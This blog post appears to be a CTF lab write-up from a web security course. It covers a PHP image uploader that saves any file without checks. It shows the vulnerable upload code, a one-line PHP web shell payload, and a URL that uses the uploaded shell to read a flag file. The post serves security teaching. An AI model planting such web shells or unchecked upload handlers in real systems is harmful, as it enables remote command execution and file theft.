Simple Web 0x04(Lab - Image Space 0x01)

Posted on 2023-01-31 | Post modified | In Security/Course/NTUST WS/Upload |

Simple Web 0x04(Lab - Image Space 0x01)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:9010

Source code

:::spoiler code

 <?php
    if (isset($_GET['source'])) {
        highlight_file(__FILE__);
        exit;
    }
?>
<h1>Image Uploader</h1>
<p>Only supports: jpg, jpeg, png</p>
<!-- upload form -->
<form action="index.php" method="POST" enctype="multipart/form-data">
    <input type="file" name="image_file">
    <input type="submit" value="Upload">
</form>
<p>
    <a href="/?source">View Source</a>
</p>
<?php
    if (!isset($_FILES['image_file'])) {
        die('Give me a file!');
    }

    $filename = basename($_FILES['image_file']['name']);

    $prefix = bin2hex(random_bytes(8));
    move_uploaded_file($_FILES['image_file']['tmp_name'], "images/${prefix}_${filename}");
    echo "<img src=\"images/${prefix}_${filename}\">";
?>

:::

There’s no any protection. Therefore, upload webshell and get shell

Exploit - `webshell`

Payload: <?php system($_GET["sh"]); ?> view-source:http://h4ck3r.quest:9010/images/09956fc7c4f424b0_simple.php?sh=cat%20../../../../flag

Post author: SBK6401
Post link: https://bernie6401.github.io/security/course/ntust%20ws/upload/2023/01/31/Simple-Web-0x04(Lab-Image-Space-0x01)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Simple Web 0x04(Lab - Image Space 0x01)

tags: NTUSTWS CTF Web

Source code

Exploit - webshell

tags: `NTUSTWS` `CTF` `Web`

Exploit - `webshell`